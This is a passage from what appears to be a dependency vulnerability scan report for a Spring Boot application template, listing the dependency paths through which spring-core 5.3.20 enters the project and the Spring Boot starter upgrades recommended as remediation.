  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
